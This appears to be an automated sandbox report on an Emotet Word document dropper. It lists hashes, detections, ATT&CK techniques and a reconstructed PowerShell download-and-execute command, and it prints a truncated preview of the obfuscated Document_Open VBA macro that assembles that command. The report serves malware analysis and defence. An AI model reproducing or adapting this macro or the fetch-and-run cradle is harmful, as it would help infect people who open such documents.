Emotet Office (OLE) malware analysis — malicious · 6f9ae03683fb127c

MALICIOUS

Office (OLE)

236.8 KB Created: 2018-07-10 22:03:00 Authoring application: Microsoft Office Word First seen: 2018-07-23

MD5: 227a5dab67bb8cec8376e60f0779a7ed SHA-1: 37ab8344dacac3a80feddbb1e4b32a15d69ca879 SHA-256: 6f9ae03683fb127c148cf6f031fbe01a610e2b16c7ea8a7107c06490ffc2a698

222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This macro is designed to execute a PowerShell command, reconstructed as 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'the embedded link')"'. This indicates the document is a dropper for a second-stage payload, consistent with the Emotet family's behavior. The ClamAV detection further supports this classification.

Heuristics 6

ClamAV: Doc.Dropper.Emotet-6958952-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Emotet-6958952-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16893 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	16893 bytes
SHA-256: `e21c104df3a88482b85074dc48066003542df303c017c45f3ced9c709ad10358`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "RtmZmibrQGOZLQ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next XDmIVl = 3375 - jnoUtO / 79145 * KumNXR fDDzcd = 58742 - vHOEv / 58522 * iNGwUL DolDTq = 74413 - MtFrnM / 82007 * uGVaB QYMmaZ = 10999 - FrSFT / 55071 * AGqUIS zqmsbZVvCus ("" + CILZdzU + jtqVIithfQH + bhwpjajCd + EiwOipGSU + COGnwA + GDjYamBiidIzp + PSwFLOkCoPSZ) HtjYvw = 30063 - NVasa / 17857 * DtiYU End Sub Attribute VB_Name = "FREbVBsJ" Function bhwpjajCd() On Error Resume Next hLfWm = iuznqp - wCVUOB + CNFji - cJszdz / 58230 * PmAAZ / 89970 * IoOVoV * NvntQ * RTGzn * VVCzKs - qjPVU vzmILC = EKwcs - DFkLHp + UpzFj - pKVwnZ / 74572 * azPmhn / 64018 * kswzw * Pufrda * Gwhci * zjLJD - rdHUZ hSEGG = jHvbSv - LRTziK + ajTYju - EEHZGR / 52561 * BBrasB / 10724 * HsNIu * JHlPb * zwfWMr * DoCMiT - QRHIR jTEuSE = "pow" + uZrLuTGwwMk + pwjAMbZb + "e" + DcdipzZSEJvXu + tfOZFmZLEAkjU + "r" + jAnkniQoR + ufXLSCRMTw + "sh" + ACdRYdF + KqdukJb + "ell" + qzaisuntiiS + RVwmiJRsLMkRj + " " + QhspHrFNbSJjdi + vzXYHwzaSo + " &" + lqRIFsdBpcA + IWUYZnNR + " (" + UMPmTkRWSHbbl + ikBthSw + " $" + zacCsAWNw + wpGKQXGipkjlTX + "sH" + MXHVYlC + HPiSkOfjEFoiq + "el" MNldT = IfzzJp - jYKmTQ + IbPEV - BPSGY / 41979 * wIKAZT / 8504 * kjUbYp * juCLa * ClwhH * ntNqZ - tsXNJN KXvvc = LwjXEM - cuXMTS + RFXqu - iwfSlo / 22095 * IipCE / 19032 * oKplN * RwzBpu * vFAEBp * PSQlP - hUPhJ CpAEV = "lid" + cvhEhvNzfRvuNS + lBPrqWtDWLK + "[1]" + SralCSKTATtE + wqVoPRlwIARE + Chr(43) + "$S" + diVlQPN + IKzsKkhVmZ + "HeL" + NAXufzViaUwMJp + IoCZXVNdPZbLbf + "L" + WFQhzqkRrsu + njUSiNwX + "I" + rnufGVKHvq + DZkBRDkhfaZRc + "d" + ssRfIMi + DLdvhkzwtzfvih + "[1" + mcsQNdCQPRPdLK + ApwGZoAuad + "3]" + Chr(43) + KKKKWkVjpHh + NjPVWljT + "'x" + sjpVwczpjFXGEG + aotfsIYz + "') " + kYEroLAP + hPXHsRzUkGb + "(N" + QLuaiCjLr + rYlsRMFpodZKR + "e" + aLDNFjbHojtlW + PpHjQUjFDYBm + "w" + qAcnrcYHiCKPQ + XajcGOjD + "-" mQkWEL = PzGQsi - iwAGhE + JmPRZ - XOzqhX / 94238 * IvkSG / 8198 * QXzTC * nXAkZ * YciUFf * PACQiV - saAPoa TuGAo = tIUzj - zikKH + EWADi - fzRKNY / 14514 * sRYhRH / 80145 * QHvAfG * ErwGYz * VPMMU * mjuvpi - fGDsA GtHhO = TNSRS - ziwIVE + wLhNAK - hwzoDG / 4618 * HcHiwv / 45603 * QddGl * iwhnNX * YfHXRr * PiNMh - WUArG sTGofU = "ob" + ORzWcjqzFIkYid + mboGOHOwULN + "jEC" + vwmdjQDIIBfJ + akJOwZkC + "T" + pfGCwCRW + KJwvuNYW + " " + JwJzoOKwQzA + bnDJAKGkJpsAQm + "SY" + jBOYYBsWJO + UFVMQKWHqDXMX + "sT" + GRwXbwc + lUaZvhAmaOPDUf + "Em." + PGcfdBBi + FMqIusXZawjz + "iO." + DlmIawml + MqzCSjSsY + "STr" + nvRTWfuEnXS + bsPtHEzTAa + "e" + sVGqdrZ + QpUpEQrjZtuw + "a" + aUZkTJImVWO + oOKjsrmK + "Mr" + EDoHnajAIMufWD + tYdUwaZ + "E" + SPNBFtQ + VjfBVLoVGR + "ADE" + rGZnzOji + dhFULTzDTiH + "r" + ZarCRfcUHrtb + OHijqbrDzwAAV + "(" + wkBtXzM + OCUJVqLt + "(N" + kwovRVqWcuC + GRJGrhln + "e" JzsNs = 24110 * UMRsjv - (43240 + dOIpVJ) VULzQ = 12822 * EKRpI - (45350 + tpUXRu) SUnHh = 64022 * lHzpl - (12099 + pkYhd) ickTqZ = "w" + LnPHJYn + OcWshMT + "-" + NhRFNCh + UzsAnYSzM + "ob" + wjWCouuZAIIEDq + kGZMZpETR + "j" + pzahzROEj + QTIIULMto + "E" + KhtnpZJbDk + FbaaImpmmDV + "CT" + ERVtGYU + ntnMcovFIf + " " + ChukEHzXiGMEh + ohwMKbln + "i" + vJArjvqDSBjbJ + Uhlhjjirj + "O." + MSaLRtNwIz + CLWAPjYNXtv + "CO" + zGAEQRUkIjXcGj + NtTVBjVKi + "M" + HtASXkRR + srfivtcw + "PRe" zizKz = UtPkpV * JMrIQ / roRCAU * orGqt / 23279 / GIZtp QYBCXW = VRDlLz * Thfwqz / dnZqdM * BnzTzC / 53483 / PzdwL vqIacji = "ssI" + FiMdmat + VJnlcMuKwUiFRN + "on." + DSfVrmU + UIQiHbtCUcto + "d" + ninPwuwnUQZjI + HiojAHDicos + "eF" + zkCPYir + XWJohnz + "LaT" + TicNuEFijj + aFItpkNJ + "es" + WnDLSaMaQiS + HbkqwKtwHh + "T" + QAvrDmzNpIoJil + FTatLjBRE + "R" + zRfOGKPCZ + MsTCjwmaHMfb + "E" + GzlkzdmJXAvJt + TjFAXGiZIwCfil + "A" + pnazLiRanv + SHZEEbocaa + "M" + YZcnwwIXUhFW + npSiNbDNHBWz + "( [" + zatPSt ... (truncated)

SHA-256: e21c104df3a88482b85074dc48066003542df303c017c45f3ced9c709ad10358

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "RtmZmibrQGOZLQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   XDmIVl = 3375 - jnoUtO / 79145 * KumNXR
   fDDzcd = 58742 - vHOEv / 58522 * iNGwUL
   DolDTq = 74413 - MtFrnM / 82007 * uGVaB
   QYMmaZ = 10999 - FrSFT / 55071 * AGqUIS
zqmsbZVvCus ("" + CILZdzU + jtqVIithfQH + bhwpjajCd + EiwOipGSU + COGnwA + GDjYamBiidIzp + PSwFLOkCoPSZ)
   HtjYvw = 30063 - NVasa / 17857 * DtiYU
End Sub


Attribute VB_Name = "FREbVBsJ"
Function bhwpjajCd()
On Error Resume Next
hLfWm = iuznqp - wCVUOB + CNFji - cJszdz / 58230 * PmAAZ / 89970 * IoOVoV * NvntQ * RTGzn * VVCzKs - qjPVU
   vzmILC = EKwcs - DFkLHp + UpzFj - pKVwnZ / 74572 * azPmhn / 64018 * kswzw * Pufrda * Gwhci * zjLJD - rdHUZ
   hSEGG = jHvbSv - LRTziK + ajTYju - EEHZGR / 52561 * BBrasB / 10724 * HsNIu * JHlPb * zwfWMr * DoCMiT - QRHIR
jTEuSE = "pow" + uZrLuTGwwMk + pwjAMbZb + "e" + DcdipzZSEJvXu + tfOZFmZLEAkjU + "r" + jAnkniQoR + ufXLSCRMTw + "sh" + ACdRYdF + KqdukJb + "ell" + qzaisuntiiS + RVwmiJRsLMkRj + " " + QhspHrFNbSJjdi + vzXYHwzaSo + " &" + lqRIFsdBpcA + IWUYZnNR + " (" + UMPmTkRWSHbbl + ikBthSw + " $" + zacCsAWNw + wpGKQXGipkjlTX + "sH" + MXHVYlC + HPiSkOfjEFoiq + "el"
MNldT = IfzzJp - jYKmTQ + IbPEV - BPSGY / 41979 * wIKAZT / 8504 * kjUbYp * juCLa * ClwhH * ntNqZ - tsXNJN
   KXvvc = LwjXEM - cuXMTS + RFXqu - iwfSlo / 22095 * IipCE / 19032 * oKplN * RwzBpu * vFAEBp * PSQlP - hUPhJ
CpAEV = "lid" + cvhEhvNzfRvuNS + lBPrqWtDWLK + "[1]" + SralCSKTATtE + wqVoPRlwIARE + Chr(43) + "$S" + diVlQPN + IKzsKkhVmZ + "HeL" + NAXufzViaUwMJp + IoCZXVNdPZbLbf + "L" + WFQhzqkRrsu + njUSiNwX + "I" + rnufGVKHvq + DZkBRDkhfaZRc + "d" + ssRfIMi + DLdvhkzwtzfvih + "[1" + mcsQNdCQPRPdLK + ApwGZoAuad + "3]" + Chr(43) + KKKKWkVjpHh + NjPVWljT + "'x" + sjpVwczpjFXGEG + aotfsIYz + "') " + kYEroLAP + hPXHsRzUkGb + "(N" + QLuaiCjLr + rYlsRMFpodZKR + "e" + aLDNFjbHojtlW + PpHjQUjFDYBm + "w" + qAcnrcYHiCKPQ + XajcGOjD + "-"
mQkWEL = PzGQsi - iwAGhE + JmPRZ - XOzqhX / 94238 * IvkSG / 8198 * QXzTC * nXAkZ * YciUFf * PACQiV - saAPoa
   TuGAo = tIUzj - zikKH + EWADi - fzRKNY / 14514 * sRYhRH / 80145 * QHvAfG * ErwGYz * VPMMU * mjuvpi - fGDsA
   GtHhO = TNSRS - ziwIVE + wLhNAK - hwzoDG / 4618 * HcHiwv / 45603 * QddGl * iwhnNX * YfHXRr * PiNMh - WUArG
sTGofU = "ob" + ORzWcjqzFIkYid + mboGOHOwULN + "jEC" + vwmdjQDIIBfJ + akJOwZkC + "T" + pfGCwCRW + KJwvuNYW + "  " + JwJzoOKwQzA + bnDJAKGkJpsAQm + "SY" + jBOYYBsWJO + UFVMQKWHqDXMX + "sT" + GRwXbwc + lUaZvhAmaOPDUf + "Em." + PGcfdBBi + FMqIusXZawjz + "iO." + DlmIawml + MqzCSjSsY + "STr" + nvRTWfuEnXS + bsPtHEzTAa + "e" + sVGqdrZ + QpUpEQrjZtuw + "a" + aUZkTJImVWO + oOKjsrmK + "Mr" + EDoHnajAIMufWD + tYdUwaZ + "E" + SPNBFtQ + VjfBVLoVGR + "ADE" + rGZnzOji + dhFULTzDTiH + "r" + ZarCRfcUHrtb + OHijqbrDzwAAV + "(" + wkBtXzM + OCUJVqLt + "(N" + kwovRVqWcuC + GRJGrhln + "e"
JzsNs = 24110 * UMRsjv - (43240 + dOIpVJ)
   VULzQ = 12822 * EKRpI - (45350 + tpUXRu)
   SUnHh = 64022 * lHzpl - (12099 + pkYhd)
ickTqZ = "w" + LnPHJYn + OcWshMT + "-" + NhRFNCh + UzsAnYSzM + "ob" + wjWCouuZAIIEDq + kGZMZpETR + "j" + pzahzROEj + QTIIULMto + "E" + KhtnpZJbDk + FbaaImpmmDV + "CT" + ERVtGYU + ntnMcovFIf + "  " + ChukEHzXiGMEh + ohwMKbln + "i" + vJArjvqDSBjbJ + Uhlhjjirj + "O." + MSaLRtNwIz + CLWAPjYNXtv + "CO" + zGAEQRUkIjXcGj + NtTVBjVKi + "M" + HtASXkRR + srfivtcw + "PRe"
zizKz = UtPkpV * JMrIQ / roRCAU * orGqt / 23279 / GIZtp
   QYBCXW = VRDlLz * Thfwqz / dnZqdM * BnzTzC / 53483 / PzdwL
vqIacji = "ssI" + FiMdmat + VJnlcMuKwUiFRN + "on." + DSfVrmU + UIQiHbtCUcto + "d" + ninPwuwnUQZjI + HiojAHDicos + "eF" + zkCPYir + XWJohnz + "LaT" + TicNuEFijj + aFItpkNJ + "es" + WnDLSaMaQiS + HbkqwKtwHh + "T" + QAvrDmzNpIoJil + FTatLjBRE + "R" + zRfOGKPCZ + MsTCjwmaHMfb + "E" + GzlkzdmJXAvJt + TjFAXGiZIwCfil + "A" + pnazLiRanv + SHZEEbocaa + "M" + YZcnwwIXUhFW + npSiNbDNHBWz + "( [" + zatPSt
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.